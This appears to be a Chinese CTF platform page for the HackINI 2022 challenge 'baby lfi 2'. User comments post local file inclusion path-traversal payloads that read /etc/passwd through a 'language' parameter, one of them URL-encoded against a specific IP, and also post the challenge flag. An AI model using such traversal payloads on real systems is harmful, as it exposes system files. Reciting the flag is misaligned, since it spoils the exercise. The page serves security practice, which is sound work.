baby lfi 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2572
提  示:
描  述:
What about making things a bit harder ?
评论
maxiaoyu 7天前

根据上一题也就是baby lfi 1我们依旧使用language来作为参数,根据题目提示,有一个目录是languages的合法目录,因此我们进入这个目录,并使用多个../来退回到根目录,并访问/etc/passwd来拿到flag。

回复 0

000ooo 1年前

?language=./languages/../../../../etc/passwd

回复 1

pandarking 1年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 0

ljt1016 1年前

为什么不合法就要增加中间的路径(../)?以及,为什么/language前面要加个"."

回复 0

小白帽来挖个漏洞 1年前

https://blog.csdn.net/guanrongl/article/details/142907012

回复 2

MOCHAOLIN 1年前

http://82.157.146.43:15979/?language=./languages/../../../../etc/%70%61%73%73%77%64

回复 0

1005667204 1年前

./language/../../../../../etc/passwd

回复 0

YOLO77w 1年前

和baby lfi 一样的方法

回复 0

15346899030 1年前

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

回复 1

xiaoxiao972521 1年前

/index.php?language=./languages/../../../../etc/passwd

回复 0

WriteUp

image
gushi666

2 金币

评分(6)

解题动态

YuHe 攻破了该题 4小时前
yeting 攻破了该题 6小时前
zhatao 攻破了该题 6小时前
jsbba 攻破了该题 3天前
hello word 攻破了该题 3天前
欲语泪先流 攻破了该题 4天前
yanghe 攻破了该题 5天前
恐龙抗狼 攻破了该题 5天前
2kniden 攻破了该题 5天前
北青萝 攻破了该题 5天前
蛋总 攻破了该题 6天前
serenade 攻破了该题 6天前
虫二11 攻破了该题 7天前
2203302152 攻破了该题 7天前
maxiaoyu 攻破了该题 7天前
nationald 攻破了该题 7天前
西红柿dun牛腩 攻破了该题 7天前
bhcxzhdsa 攻破了该题 7天前
david666 攻破了该题 8天前
木头呀 攻破了该题 8天前
问题反馈